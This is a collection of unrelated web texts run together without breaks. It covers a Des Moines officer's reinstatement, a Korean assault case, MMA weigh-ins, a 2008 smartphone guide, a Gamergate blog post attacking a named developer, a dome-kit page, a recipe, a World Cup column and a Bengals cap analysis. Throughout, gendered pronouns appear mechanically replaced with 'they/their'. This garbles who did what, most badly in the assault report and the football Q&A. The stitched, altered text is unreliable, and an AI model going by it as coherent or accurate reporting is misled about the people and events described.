Grimes, 34, was fired following an investigation into their arrest on Dec. 27, 2013, when they were charged with domestic assault causing injury and fourth degree criminal mischief. Prosecutors ultimately dismissed the domestic assault charge when Grimes pleaded guilty to the lesser criminal mischief charge and agreed to take an abusive behavior class.
The commission acknowledged the officer's misconduct, but determined firing was too severe. As a lesser punishment Grimes will not receive back pay for the past the 6½ months since their termination.
The Civil Service Commission voted 4-1 to overturn the firing, with member Jeff Hall siding with the city's decision to fire the officer.
Tuesday's order marks the second time in the last five years the commission overturned the city's decision to fire an officer. The previous overturned appeal involved officer Mersed Dautovic, 31. But Dautovic never returned to work before a federal jury in 2012 convicted them of a more sever sentence for excessive force.
Neither Hall nor Grimes responded to a request for comment. Grimes' attorney Mark Hedberg also declined to comment.
Grimes is expected to undergo some basic training before picking up patrol shifts, according to Sgt. Jason Halifax, Des Moines police spokesperson.
"He will be required to complete some refresher training as is typical for officers who are gone for an extended time," Halifax said. The reintegration process will likely take one to two weeks.
The commission said Grimes' firing was based on "misconduct and prior discipline for excessive force."
The officer previously served a two-day suspension related to an excessive force complaint in 2011.
John Twombly of Des Moines accused Grimes of punching them multiple times while they were restrained on the ground at their own wedding reception. The incident left Twombly with broken bones in their face.
The complaint escalated to federal court and a $75,000 civil judgment was issued against Grimes and the city in 2014.
In 2010, Grimes also took two weeks paid administrative leave after firing a gunshot at a KCCI-TV photojournalist outside the television station's studio. The journalist, who Grimes mistook for a suspect, was not hit.
NEWSLETTERS Get the Breaking News Alert newsletter delivered to your inbox We're sorry, but something went wrong Alerts on breaking news delivered straight to your inbox. Please try again soon, or contact Customer Service at 1-877-424-0225. Delivery: Varies Invalid email address Thank you! You're almost signed up for Breaking News Alert Keep an eye out for an email to confirm your newsletter registration. More newsletters
Unless the civil service order is appealed in district court, which is not likely, Grimes should be eligible to return to work this week, according to city officials. They will receive a salary of $73,195.
"We have indicated that we will accept the majority decision (of the commission)," Deputy City Attorney Carol Moser said.
Read or Share this story: http://dmreg.co/1BC9Lcl
By Yi Whan-woo
A man was apprehended for cutting off and swallowing their wife's nipple after they demanded a divorce, police said Monday.
The ethnic Chinese Korean swallowed the part of their spouse's left nipple after removing it using a craft knife following a scuffle at their home in Andong, North Gyeongsang Province.
According to the Andong Police Station, the 48-year-old man was drunk when they got into an argument early Thursday with their wife, a 28-year-old North Korean defector. The victim asked their husband for a separation, accusing them of relying on day labor for a living and for habitual drinking, before they attacked them
The man committed the crime after forcing them to the floor. The woman is being treated in hospital. Police are seeking an arrest warrant.
The weigh in event for ONE FC: "Rise to Power" took place earlier today (May 30, 2013) at the SM Mall of Asia Arena and was extremely eventful with four fighters missing weight, most notably Ryan Diaz, who came in almost 10 pounds over the bantamweight limit ahead of their bout against Yusup Saadulaev.
There will be two ONE FC titles on the line as well as the final of the Bantamweight Grand Prix and all the fighters in these contests made weight at the first attempt. Honorio Banario, who is defending their Featherweight belt, came in at 144.7 pounds while their opponent, Koji Oishi, weighed 144.8 pounds.
Koetsu Okazaki and Bibiano Fernandes both tipped the scales at 134.4 pounds ahead of their fight for the interim bantamweight belt while ONE FC bantamweight GP finalists Kevin Belingon and Masakatsu Ueda were 134 and 134.6 pounds, respectively.
The other three fighters to miss weight were Tim Sylvia, Andrew Leone and Lowen Tynanes and ONE FC officials confirmed that all will have money deducted from their purses. The bout between Saadulaev and Diaz was in jeopardy but Matt Hume was able to broker a deal which will allow it to go ahead despite the difference in weight.
ONE FC: ‘Rise to Power , SM Mall of Asia Arena, Manila,
Honorio Banario (144.7) vs. Koji Oishi (144.8) - for featherweight title
Bibiano Fernandes (134.4) vs. Koetsu Okazaki (134.4) - for interim bantamweight title
Kevin Belingon (134) vs. Masakatsu Ueda (134.6) - bantamweight grand-prix final
Rey Docyogen (124.7) vs. Yasuhiro Urushitani (124.7)
Phil Baroni (169) vs. Nobutatsu Suzuki (169.4)
Eduard Folayang (154.4) vs. Kamal Shalorus (154.2)
Geje Eustaquio (124.7) vs. Andrew Leone (127.7)
Ryan Diaz (144.8) vs. Yusup Saadulaev (134.4)
Felipe Enomoto (153.1) vs. Lowen Tynanes (155.2)
Tony Johnson (264.2) vs. Tim Sylvia (271)
The first fight (Tony Johnson vs. Tim Sylvia) gets underway at 6:30 am ET and the entire card can be purchased for $9.99 with the three-fight undercard free to view. For more information visit: www.onefc.com.
www.twitter.com/jamesgoyder
You're more likely than ever to buy a smartphone, not just because they do so much more than dumb feature phones, with real email, decent web browsing and downloadable applications, but because they're cheaper than ever. With the exception of some expensive ass unlocked-but-unsubsidized European models, you generally don't have to pay more than $300 for a balls-to-the-wall smartphone—though the voice plan plus data fees can easily run you $80 or more per month. Here's a rudimentary overview of your choices (more now than ever before), why you might pick them, and why they might suck for you.
Advertisement
ANDROID by Google
The splashy new entrant into smartphone land, Android is Google's Linux-based open source mobile platform meant to bring real, constantly connected internet to phones. Even though it's debuting on a single phone, the G1 from HTC, expect to see the free OS show up on tons of phones, from HTC, Motorola, and others. It's totally modern and powerful, and the fact that it's open source makes it incredibly appealing to some developers, so most signs point to awesome applications and mobile internet.
T-Mobile G1 Android Phone Hands-On We just got an early hand on with T-Mobile's G1 Android and yes, it does look as nice as it… Read more Read
Why You'll Use It Unlike BlackBerry, iPhone or Windows Mobile, there are no limits on what application developers can do. So its real strength is the power that developers hold—we're hoping to see some of the wildest, most innovative applications hit Android first. You'll have tons of hardware options, from low to high end, and pretty much any input you want—touchscreen, QWERTY, whatever—once the ball gets rolling. This is the ultimate geek phone.
Advertisement
Why It Sucks Developers have to plug a lot of holes right off the bat, like the complete lack of business features. If they fail to come through, it could fall flat. Not as elegant as the iPhone (though it beats, say, Windows Mobile, by leaps and bounds), it still doesn't quite pass the "mom" test.
Why Android Is Bad for Business As a guy who spends way too much time in Google apps, I look forward to testing Android now and as… Read more Read
Advertisement
BLACKBERRY by RIM
Research in Motion's BlackBerry started out as a glorified two-way pager before evolving into what most consider the best smartphone for email. It is also a shining validation of tightly integrated hardware/software model—they make the phones, they make the operating system. Previously it was a phone that corporations gave to people in suits because of its BlackBerry Enterprise Server, which integrates it with a corporation's email, plus its Exchange support and high security. Now, though, it's increasingly popular with real live people. The BlackBerry Bold offers the latest version of the standard OS, while the recently announced Storm uses one modified for a touchscreen.
BlackBerry Bold Review If you were feverishly anticipating a cellphone this year, it was one of two phones: this is the… Read more Read
Advertisement
Why You'll Use It is has the best email experience around—in part thanks to their traditionally awesome keyboards, so the touchscreen Storm is something of a risk. The OS is really to easy use, with everything neatly presented up front using rows and rows of icons. There's a reason it has surpassed Windows Mobile in marketshare and is the corporate drone phone of choice. Also, RIM seems intent on juicing up its already solid dev community, so expect even more great apps in the future. (Catching a pattern with the importance of apps?)
Why It Sucks It's totally closed and proprietary. You've gotta buy a BlackBerry phone to get the OS. If you're not using the Bold, Storm or the Flip Pearl, it's not very sexy and can easily look dated. Also, in past models, the web browsing experience was absolute garbage. Now just finding its stride as a consumer device, it's not as media-centric as some others, but that is fortunately changing as well.
Advertisement
IPHONE OS X by Apple
Some haters still stay that the iPhone isn't really a smartphone, but for all practical intents and purposes it is. Running a stripped down but very real version of Mac's OS X, it's one of the most powerful and modern OSes of the bunch.
Why You'll Use If it's the most attractive and usable smartphone around, period. It has the best mobile internet browser, largely thanks to multitouch navigation. But its killer feature might be its ability to run third-party apps, which come from one of the most vibrant dev communities around, and are often—but not always—actually useful. Not to mention that, as an iPod, it's also the best music phone on the planet—at least until that mystery Zune phone appears.
Advertisement
Why It Sucks For being so powerful and modern, it can't do things even the dumbest phones do, like MMS, or copy and paste, a smartphone standard. Also email and corporate features aren't quite up to BlackBerry standards, lacking email search among other deficiencies. Apple tightly controls it, which might hurt development and innovation. And the whole making a phone call thing itself still kinda blows.
Advertisement
WINDOWS MOBILE by Microsoft
Unlike the iPhone and OS X, the only thing Microsoft's smartphone OS shares with actual Windows is the name. It has its roots in Windows CE and originally went by the Pocket PC moniker before becoming Windows Mobile. Mostly for corporate troopers, the current version number is 6.1, and it comes in touchscreen and non-touchscreen flavors. It recently fell behind RIM's BlackBerry in marketshare.
Why You'll Use It Diehards swear by its power, even if it isn't so easy for Joe Six-Pack to pick up and run with. It runs on handsets from a bunch of manufacturers, and unlike the BlackBerry and iPhone platforms, you can build your own device to run it. So much of the most advanced mobile hardware you'll lay your eyes on runs Windows Mobile, including the HTC Touch HD and Sony Xperia X1. It's got a corporate soul, so it's designed for business users, and it has specialty applications (like in the medical field) that some professionals need and can't get anywhere else.
Advertisement
Why It Sucks There's a reason premiere Windows Mobile handset makers have become increasingly adept at covering up the user interface: It's frankly terrible, especially when it comes to touch navigation. It isn't a great media phone, has a god-awful native browser and doesn't look so hot either. Unfortunately the next version, WM7, is over a year away.
Advertisement
PALM GARNET
Oh, whither Palm. Without getting into the complicated story of Palm's various fits, seizures and splits, the Palm OS goes all the way back to 1996, when it powered Palm's PDAs. All but dead now, its last hurrah was on the Centro before Palm plunged ahead with Windows Mobile. Supposedly work on its Linux-powered follow-up is well under way, but it's been delayed multiple times.
Why You'll Use It Though dated, the Palm OS makes a great starter smartphone, hence the success of the cheaper-than-dirt Centro. The learning curve is shallow and it provides most of the smartphone features you expect, even if it does look like it's still trapped in 1996.
Advertisement
Why It Sucks Uh, it's basically dead. You probably won't see it on another phone post-Centro, Palm's more pricey phones use Windows Mobile, and prospects on the upcoming Palm OS overhaul are dicey. (They should take Android and use it as a powerful foundation for the next Palm OS, but that's just my two cents.)
Advertisement
SYMBIAN by Nokia
Symbian is the world's most popular smartphone platform, thanks to Nokia. The most prominent variant right now is S60. While it doesn't seem so ubiquitious in the US, abroad it's far more common. It powers some seriously sick hardware, like Nokia's N series, and has a solid dev community, though the free side of that isn't as big as on other platforms.
Why You'll Use It Did you miss the "world's most popular smartphone" thing? Buy a Nokia multimedia phone, and you buy Symbian. It offers a lot of the best smartphone features—strong email, web and calendar, plus a large global development community—in a package that is far more usable than Windows Mobile. Also, it works with Macs with far less hassle than Windows Mobile.
Advertisement
Why It Sucks It can be overly complicated, and still not as easy to use as a BlackBerry or the iPhone. If you're not using a really solid piece of hardware, it can be really sluggish. Also, connecting to the web can be annoying. And while it's on handsets from a couple of other manufacturers, for the most part, you had better love Nokia hardware.
And that's pretty much the lay of the land, at least for now.
Something you still wanna know? Send any questions about dumbphones, dumber people or Mark Wahlberg to tips@gizmodo.com, with "Giz Explains" in the subject line.
WARNING: Contains spoilers
------------------------------
Today saw the first day of filming for the Doctor Who 50th Anniversary Special and the first fan photo has reached the internet.
Witnesses reported that David Tennant, Matt Smith and Billie Piper were all on set today on location in Neath. Other witness reports and pictures also revealed the presence of the Tenth Doctor's TARDIS and a medieval style tent.
The picture below, though distant, shows David Tennant standing to the right of the group with Billie Piper beside him.
David Tennant, Billie Piper, Matt Smith, Jenna-Louise Coleman and John Hurt have all been confirmed for the celebratory episode, and last night the BBC confirmed that Gavin And Stacey star Joanna Page would also be joining the cast. Today it was announced that the classic foes the Zygons would be returning to face the Doctor for this episode.
Visit our new Doctor Who 50th Anniversary pages to keep up to date with all the news and developments about the Special
Crystal Palace are hoping to sign a new striker in January.
Khouma Babacar is the subject of a £8.7 million bid from Crystal Palace, Gianluca Di Marzio reports.
The 22-year-old Fiorentina forward has moved into Alan Pardew's sights after failing to sign Simone Zaza from Juventus, with the report confirming that Juventus rejected a £19 million bid from the Eagles for the striker.
Refusing to raise their bid for Zaza, Pardew has looked elsewhere, and has settled on Babacar.
A striker, also able to play on the wing, Senegalese youth international Babacar is renowned for their strength and power, and whilst their technical skills are not exceptional, their return of 19 goals in 69 games for la Viola is respectable.
They look to be a player who fits into Palace's system, and it is claimed that they have readied and submitted a bid of roughly £8.7 million (€12m) to Fiorentina for the transfer of Babacar's services.
There is no indication yet that Fiorentina have either accepted or rejected the offer, but Palace are sure to keep trying to bring them to Selhurst Park as the transfer window progresses.
So today on Twitter, a few tweets came to my attention from game developer Brianna Wu. Namely some pictures they took of their game collection, across their many years as a gamer (which was about a couple hundred) which were accompanied by Wu making broad judgments against the game industry based off of their game collection.
“After a lifetime of collecting games,” they write, “this is the number that star a black protagonist”, with a picture showing one illuminated game. I could make the point that using your own game collection, which would be determined by limitations like personal wealth and personal preferences for certain games and genres, to make a broader statement on the way the gaming industry operates is patently absurd and laughable…so I will. Using your own game collection to make a broader statement on the way the gaming industry operates is patently absurd and laughable.
When I look at those pictures, I'm not thinking “the industry has an issue with making games with black protagonists”, I'm thinking “this woman must obviously have an issue with buying games with black protagonists since she's been collecting games for years and has a massive shelf of games spanning an entire wall and only saw fit to buy one game with a black protagonist, despite dozens of games having black protagonists”. Congratulations Brianna Wu, in a single picture you demonstrated why the games industry continues to operate in a manner you claim to find so distasteful: at the end of the day, you can say whatever you want on Twitter, but your purchasing decisions are saying something completely different to publishers and developers alike. Maybe take control of your own ‘problematic' purchasing decisions before you criticize anyone elses'.
But there's additional context to this. There's a whole 'nother layer of infuriating hypocrisy to these tweets. Brianna Wu is a game developer. They were the lead designer and president of their own studio. They have released a game, a game called Revolution 60. Here is the poster for that game. As you keep that poster in mind, let us together read this tweet.
Brianna Wu, lead designer of Revolution 60, head of Giant Spacekat, is attempting to criticize the games industry at large (through proxy of their own terrible purchasing decisions) for supposed 'crimes' which they are complicit in. Look through their game and you will not find any black women (or any 'women of color', for that matter). There are no gay men. There are no transgendered people. No disabled people. And lastly, no people with autism. No, I don't care if she's acknowledged that those were indeed problems with Revolution 60. Someone who's made that many mistakes should be more understanding of how tough it can be to develop games with diversity in mind and less quick to point fingers at others when they screw up. I guess asking for sympathy when dealing with other developers in light of your own personal shortcomings is too much.
But to return to the problem at hand, that last bit about the lack of autistic characters stood out to me because I've never seen Wu make a call for autistic main characters in gaming before. Most people don't make that call. We're kinda left by the wayside most times when it comes to demanding representation and truth be told, most autistic people that I know who are gamers don't really care too much about the whole issue. They'd much rather enjoy the games they play rather than quibble over characters, one way or another. Like the majority of gamers, their primary concerns are about the game's entertainment value, not if it represents them or not.
As most of you who are reading this probably know, I am making a game with an autistic main character. The game is called Freak and it was greenlit a few weeks ago. We're currently working on a demo. We've gotten a lot of support from the gaming community but not a lot of buzz from major gaming websites, not that I particularly mind. Point is, I'm working on it.
And yet, me working on it seems to get less traction or attention than Wu yelling from atop their twitter soap box about how important it is that it gets done. This is something I've seen happen for years but it's gotten no less infuriating to witness over time, especially when they decide to explicitly bring up the subject matter of autism representation in gaming. I don't need them to talk about the subject of autism representation in gaming. I'd much rather them not insert themselves into the issue and speak on something when there are plenty of autistic gamers and developers who can discuss it themselves. To be blunt, it deeply offends me that Brianna Wu thinks they have any reason to speak on the subject whatsoever, especially if their only intentions are to use it as a means to raise their own profile while ignoring what actual game developers with autism who are developing games with autistic lead characters are saying. And if I am being perfectly candid, Wu's continual behavior of speaking over other developers, bullying developers who do try to speak up, and then attempting to incite boycotts against people for not acting the way they think is right or not making games the way they want them to be made needs to stop immediately.
If Wu wants to merely talk about diversity while others actually do the heavy lifting, that's their prerogative, but at no point should anyone be confused on who is doing what. Wu tweets about how sad it is that there are no games with playable autistic, black women, or disabled characters in games while I'm making a game that has all three as playable characters. I'm by no means alone on this either. I can assure you there are dozens of other developers doing this exact same thing. There are people in this industry who actually do the work that needs to be done and they deserve to be recognized. They deserve to be heard. Not people like Wu who talk a big game but can't make anything that even remotely resembles what they demand of others.
And the worst part, the part that makes me seethe with anger to my core, is the knowledge that because I have voiced support for Gamergate, Wu will never publicly support our game despite it doing exactly what they just demanded of the industry.
I spoke out and Gamergate supported me. They sympathized with my problems. They listened to what I said. They supported my game on greenlight. They gave us critique when we needed it. They have been fair and compassionate to us.
Meanwhile, the supposedly open-minded, progressive gaming elite have made no mention of us. They didn't answer our emails. In October, myself and two female coworkers did an interview with the Escapist pertaining to Gamergate. This interview was one in several, which were all published under the heading of ‘What Developers Think of #Gamergate'. Some people (including at least one game journalist, specifically the managing editor of the now-defunct Joystiq, and several others assorted ‘games media' personalities), seeing that most of the interview subjects were male in this series, took offense at the implication that male developers were the default, and female developers the deviation. A valid concern…except, again, I had done the interview with my two female coworkers, meaning that the interview series had taken input from both men and women and that the gender-neutral approach was completely justified. The Escapist explained this at length to the people complaining, but they either didn't listen or didn't care, because they continued complaining until the Escapist caved and changed the title.
As to the reaction to the interview series itself, I know that having those interviews be posted made Jim Sterling pretty upset. It's pretty disquieting to learn that if a person you admired had had their way, you wouldn't be able to speak up on matters that concerned you. I watched the Jimquisition pretty regularly for at least two years and never once tried to get their show shut down or express disapproval that they were able to speak their opinion. I'd expect at least comparable courtesy when doing a single interview, but that's just me.
But that's not all. I try really hard to avoid tweeting when I'm emotional, since…ya know…internet is forever and internet never forgets and all that. But one day I slipped. One day I was really, really worried about what the future would hold for me, and I did a series of 13 tweets regarding my fears. It made the rounds among Gamergate circles and ‘anti-Gamergate' circles. Among the Gamergate circles it elicited genuine sympathy, and for months afterward was cited as an example of why it was important that Gamergate continue fighting to ensure that game developers got an even shake from the gaming press (for which I am incredibly grateful). And the gaming press themselves? Well the Gaming Editor at Badass Digest (sorry, ‘Birth.Movies.Death.') posted the tweet series and publicly mocked it, at which point others gathered around and started making fun of it too. Because these are the compassionate people who care about making sure smaller developers wanting to make games about personal issues get an even shake, right? You can laugh at those tweets all you want, I don't really care, I just think it's funny to see this behavior come from a journalist. Silly me, assuming there were standards after nine months of #Gamergate.
My patience for people who talk sweet nothings but leave people who are struggling out in the cold is over. I'm tired of people demanding the industry do things that they themselves won't do. I'm tired of people who claim to care about getting new developers with new perspectives into the industry, but don't actually help promote anyone. Most importantly, I'm tired of people who use social justice in gaming as a platform to elevate themselves and not to promote actual change. All of these people exist in greater numbers than most would like to admit, and it's their turn to get called out.
But by all means, continue. Keep bullying people on social media who are simply trying to voice their concerns. Keep using pressure to blot out the dissenting voices of people you disagree with even when they're struggling to get a foothold in the industry just like the people you claim to support. Keep talking over developers who are trying to actually make change. Your hypocrisy only shows more each time you do it and eventually, just like today, people like me will snap. They'll stop listening to what you have to say and start doing what they should have been doing all along: speaking for themselves.
Brianna Wu does not, and never will, speak for me as a developer with autism. Neither does the gaming press. Neither do any of the progressive-minded gaming elites who preach the importance of diversity but seem reluctant to ever celebrate or promote it when it happens. When myself and my team try to talk about our problems, we're either mocked or ignored. The Gamergate community has done more in these last eight months to ensure that Freak got made than anyone else. To my immediate knowledge Freak will be the first game to have a playable autistic protagonist. When it does get released, and Wu adds it to their little game shelf to mark some nonsensical forward march of what they arbitrarily deem to be ‘progress', that victory will not be hers. Nor will it be a victory for the progressive gaming elite who ignored us and mocked us. It will be a victory for everyone in Gamergate who looked at Freak and said 'this game sounds cool'.
Reflect on that as you go out and actually add some diversity to your game collection instead of pretending these games don't exist just because you can't be bothered to put your money where your mouth is.
Our complete dome shell Kits include connection hardware, riser walls, struts, exterior triangles, the vent system and our construction manual. We also offer framing kits and connector kits.
A Natural Spaces Dome can be uniquely designed for extremely high winds, earthquakes, tornados, hurricanes, floods, and fires. Our domes can take the worst that Mother Nature can produce.
Commercial, public & institutional domes require preparation of plans with complete engineering certification. Working with our consulting engineers, Natural Spaces can provide these services.
An extensive but partial listing of our domes by city location. Call or email us if you need comparison domes for selling or mortgage purposes.
Do you have a “sick” dome? Leaky roof, condensation problems, rotting wood, leaky skylights, the dreaded sagging exterior panels, unhealthy indoor air quality, moldy walls?
Dr. Dome™ can provide answers to questions regarding dome renovations, repairs or remodeling.
Leaky domes? Need round furniture? Domes don't sell? Hard to build? Hogwash! It's time to blast holes in unproven misstatements about domes.
Read some of our most common questions and our answers to them!
Hear some real feedback and stories from dome owners.
Movie filmed at Natural Spaces Domes in North Branch. Premiered at the San Francisco International Film Festival April 8th, 9th, and 13th, 2017.
Meet some dome people who have touched our lives.
(Pictured: Janet Johnson, August 21, 1999)
A list of very unique domes you can rent for a vacation – Worldwide.
Quick & Easy Crunchy Air Fried Broccoli Crisps
I've heard about how amazing those little broccoli crisps at Trader Joe's, but I refuse to buy something I can easily make…so voila. Here's a quick and easy recipe for some Quick & Easy Crunchy Air Fried Broccoli Crisps. This recipe is actually super simple. and can be done in a normal oven, but will take much longer. Take a look at my Sour Cream and Onion Kale Chips Recipe for some tips on how to dehydrate veggies in the oven.
But Why Use an Air Fryer?
Air fryers are awesome. they are not fryers however. First of all, if you are wondering, an airfryer is basically a mini convection oven: A convection oven heats like a normal oven, but circulates air by way of a fan. this circulation of air keeps the humidity low, and in turn, will give you a crisper “fried” like exterior on certain items. Plus, it cooks your meals quickly, which I'm all about on weeknights.
I know if you're keto, you may prefer to deep fry thinks, which is fine, but frying is definitely more caloric and I am trying to keep my calories as low as possible. Plus, if you're also a Bariatric patient like me, you may be a little sensitive to fats.
The Air fryer, if used at a lower temp, can also replicate a dehydrator, and if used in between, give you a bit of the best of both worlds. Okay, enough about Air Fryers, hope you enjoy the recipe!
Ingredients:
2 Crowns of Broccoli
2 tbsp of olive oil; enough to coat lightly
I honestly used closer to 1 tbsp
2 Tbsp of TajinTajin is a blend of Mexican chilies & lime
Not super keen on lime? Try changing it up these seasonings. I promise you, they will all be delicious.
As for the Steps…..
Cut the broccoli florets into bite size pieces.
Coat in oil and then spices.
Set air fryer to 200 degrees Fahrenheit for 30-35 mins.
Let cool for 20-30 minutes (or don't), and enjoy! Do you have any other seasoning
suggestions or requests? Let me know in the comments!
Just A Quick Note:
As with all dehydrated veggies, this isn't going to yield a ton of crisps. You may want to double or even triple this recipe if you'd like to have a decent amount saved! Just a thought.
No European team has won a World Cup held in South America - it is one of those facts that on examination is not quite as significant as it might appear. They have only had four opportunities, the last of which was way back in 1978.
Perhaps, then, this fact has little relevance for 2014. The world is vastly changed since 1978. In psychological terms, it feels much smaller. Crossing the Atlantic Ocean is not such a marathon trek. So maybe this will be the year that Europe breaks its South American duck.
However, in terms of climate, this will be the most difficult South American World Cup yet for the European visitors. June and July are winter months. Uruguay (1930), Chile (62) and Argentina (78) can be decidedly cold at this time of year.
The previous Brazilian World Cup (1950) was mainly played in the south eastern cities of Rio de Janeiro and São Paulo, where winter temperatures are mild. But the tournament timidly pointed the way to a more decentralised future for Brazilian football, taking one match up to Recife in the north east.
World Cup winners in South America Year Hosts Winners 1930 Uruguay Uruguay 1950 Brazil Uruguay 1962 Chile Brazil 1978 Argentina Argentina
Sixty four years later, the north east will stage a third of the World Cup, with games in Salvador, Fortaleza and Natal as well as Recife. This region is untouched by winter - it boasts tropical heat all year round - as do Manaus to the north and Cuiaba to the west, two other host cities.
In temperature terms, matches in all of these cities will resemble those of North American World Cups (Mexico in 1970 and 86, USA in 94), where many of the matches were played in sauna-like conditions - and, also, where the Europeans have never come out on top.
Added to this is the fact that world governing body Fifa is staggering the matches with three different kick-off times per day, all of them accessible to the European TV audience. At this time of the year Brazil is four hours behind the UK. The only way to fit in three separate matches and reach a big European audience is to start early. So 24 matches will kick off at 13:00 local time - 17:00 in the UK.
In the venues of the south and the south east, this is not a problem. But up in the north east - where seven of these early kick offs take place - teams are likely to be exposed to fierce heat. Even the next kick off time (16:00 local, 20:00 UK) can be uncomfortable; Spain and Italy really suffered through their semi final played at this time in Fortaleza in last year's Confederations Cup.
But as for the 13:00 starts, it is unthinkable for a major domestic game to be played in these venues at that hour. When I speak to local players and coaches about the lunchtime kick-offs in the north east, I consistently hear the same word: "Inhumane"
'In the last two World Cups, Germany have ended Argentina's dream. But if they meet again this time, Lionel Messi and company should be by far the fresher side'
Argentina were the big winners of the draw, and not because they line up in their group matches against Bosnia, Iran and Nigeria - but because they will play the entire tournament without once having to confront the heat of the north east.
At the other end of the scale are Germany. Not only are Portugal, Ghana and USA tricky group opponents but the Germans have 13:00 kick-offs in Salvador and Recife either side of a 16:00 start in Fortaleza.
Even if, as predicted, they make it through safely to the knock-out round, they will surely have paid a price for such prolonged exposure to the conditions. Their athletic capacity will have been drained.
Italy also have it hard - though they have made it much harder for themselves with the bizarre option to base themselves outside Rio, a long journey away from all of their matches. After playing England in Manaus the Italians then have 13:00 kick-offs in Recife and Natal.
And to gauge the effects of playing in high temperatures, the Italians have the experience of USA 94, when they lost in the final on penalties to Brazil. Their captain and outstanding centre back Franco Baresi injured a knee early in the competition and underwent an operation.
Amazingly, they were thrown back into action in the final - and even more amazingly, they gave a man-of-the-match performance, blotting out the great Romario. The conclusion drawn by both coaches - Italy's Arrigo Sacchi and Brazil's Carlos Alberto Parreira - was that in such conditions it was better to be injured than tired.
Sacchi tells of how, at half time their midfielder Roberto Donadoni announced that if the team pushed up into the opposing half they simply would not be able to get back again. And this, surely, is the most salient point about football in extreme temperatures; it leads to cautious play.
How will the Germans, with their swashbuckling approach, adapt to this reality? In the last two World Cups they have ended Argentina's dream. But if it happens again this time, Lionel Messi and company should be by far the fresher side.
Questions on South American football to vickerycolumn@hotmail.com, and I'll pick out a couple for next week. From last week's postbag;
Q) I'm just wondering what chance Atletico Madrid centre back Miranda has of forcing their way into the Brazil team? With David Luiz not playing regularly at centre back could they overtake him? Also do you see any late bolters for the squad?
Mike Jones
Brazil coach Luiz Felipe Scolari is a master group former. They choose their players and fills them with confidence. Three of the centre backs are a lock in; the first choice pairing of captain Thiago Silva and David Luiz (and the fact that Chelsea use them elsewhere is, as far as Brazil are concerned, Mourinho's problem) plus Dante of Bayern Munich. There are a number of candidates for the remaining slot - the front runner is probably Marquinhos of PSG, who is being groomed for the future. Others who will be waiting and hoping include Dede of Cruzeiro and Henrique of Napoli.
A clear case can be made for Miranda, but he's been out of contention for a while, and those who have played have done well, so I think it's unlikely - and the same applies to any late bolters, including Philippe Coutinho of Liverpool. Barring late injuries, Scolari's problem is not thinking about surprise selections - it is that some of those who have served them well over the past year will have to be left out.
Q) Are there two different versions of Alexis Sanchez? I just feel Alexis plays a little conservatively and restricted within their role in the Barcelona system when playing for their club side compared to them really playing for Chile when they have more of a free role, and takes on defenders more often.
Cristobal Rojas
I think you have a point - in fact last week's column dealt with this very issue, of how a different collective context produces a different player. Sanchez themselves said that when we went to Barcelona it was as if they had to learn to play football all over again - they had always been the most skilful player and thus allowed to follow their instincts, and now they had to fit into a passing gameplan.
Also there is the psychological boost (or burden) of being important. With their club, he's just one more player. For Chile, he's the leader of the attack, and seems to respond well to this.
With the start of the 2013 League Year less than a month away, it is an appropriate time to evaluate where the Bengals stand with regard to their Cap Hits and Cash Spends for individual players.
Below is a table of 48 players currently under contract for next season. Two Exclusive Rights Free Agents (WR Andrew Hawkins and LB Vincent Rey) are included because the Bengals are virtually assured to tender both of them the required base salary in order to maintain exclusive negotiating rights in the event that the club desires to enter into a contract with them beyond the tendered amount. If the Bengals do not wish to subsequently offer a contract beyond the required tender, the club is still assured the services of the player for 2013. If the required tender is offered, the player is required to sign it. The required tender is a 1-year contract with a Base Salary ("Paragraph 5 Salary" to use CBA and player agent terminology) of at least the minimum base salary applicable to the player. Since both Hawkins and Rey have completed two "Credited Seasons" - as defined in Article 26 of the CBA - the required minimum salary for players with two Credited Seasons for the 2013 season is $555K. As such, $555K appears in both the Cap Hit and Cash Spend columns for both players. For both Hawkins and Rey, as long as the Bengals tender them by 4:00PM EST on March 12th, both players must sign the tender and the Bengals will be assured their services for the 2013 season at the tendered amount. The club is free to negotiate a contract (above and beyond the tender) with any of their own ERFA players either before or after offering the tender.
Additionally, some players who are under contract are not included in the table (e.g. Taveon Rogers, Lavasier Tuinei, etc). However, in the unlikely event that these players make the final 53-man roster, they would only slightly alter the team's overall Cap Hit and Cash Spend numbers listed below since their base salaries are at or near the league minimum.
I have placed two stars next to six UFA players who are the most likely to be re-signed by the Bengals (DE Mike Johnson, DE Robert Geathers, OT Andre Smith, WLB Thomas Howard, CB Terence Newman, CB Adam Jones). The number of players in the table quickly jumps to 54 if the Bengals re-sign all six of these UFA players. Even though the offseason roster limit is 90 players, only the Top 51 player salaries are used when determining/calculating a team's Salary Cap compliance.
With that in mind, this table obviously does NOT include the 2013 draft picks who will be on the final 53-man roster, as well as the handful of players the team is likely to sign as free agents who were on other clubs last season. Judging by recent FA history, the Bengals will likely sign 5-8 Free Agents from
other teams (e.g. Last year, the team signed DE Jamaal Anderson, G Travelle Wharton, CB Jason Allen, CB Terence Newman, RB BenJarvus Green-Ellis, DE Derrick Harvey, G Jacob Bell. Even though the last two players didn't make the 53-man roster, the team still signed them from other teams. The year prior, the team signed LB Thomas Howard, LB Manny Lawson, QB Bruce Gradkowski, CB Nate Clements, and traded for S Taylor Mays. Regardless of the abilities of these players, the bottom line is that recent history suggests that the Bengals will likely sign between 5-8 free agents from other teams).
Let's take a look (the table is an embedded Excel spreadsheet that you'll need to scroll):
Note that I have highlighted (in red) three players who are virtually assured to have their contracts terminated prior to the start of the new league year: G Travelle Wharton, CB Jason Allen, DE Jamaal Anderson. Terminating the contracts of these three players will save the Bengals real money (in the form of base salaries and roster bonuses), as well as create even more Cap room for the 2013 season.
Overall, this table confirms what various national media outlets have recently reported. That is, the Bengals have approximately $53-55M in Cap Room for the 2013 season.
Additionally, note the Overall Cash Spend column. As it stands today, the Bengals are projected to have a 2013 Cash Spend of approximately $59,723,367. Even though the 89% Minimum Team Cash Spending Requirement is calculated over a 4-season period, if the Bengals want to be at (or very near) this required 89% threshold in each of the 4 seasons, they will be spending close to an additional $48,055,633 (in cash) this season in order to reach 89% Cash Spend threshold ($59,723,367 + $48,055,633 = $107,779,000, which represents 89% of the approximate $121,100,000 Salary Cap).
Overall, the Cincinnati Bengals find themselves with an impeccably clean bill of salary cap-health heading into the 2013 season. As many other NFL teams scramble to restructure contracts, or even purge their rosters in order to comply with the salary cap, it is safe to say that the Bengals' salary cap situation is the envy of almost all other NFL front offices. As the dawn of the 2013 NFL season quickly approaches, the Bengals are in a great position to retain their own home-grown talent, as well as target other players who can further contribute to the team's recent success and propel them into much deeper playoff runs.
Third Trimester: June 20, 2013 to September 22, 2013
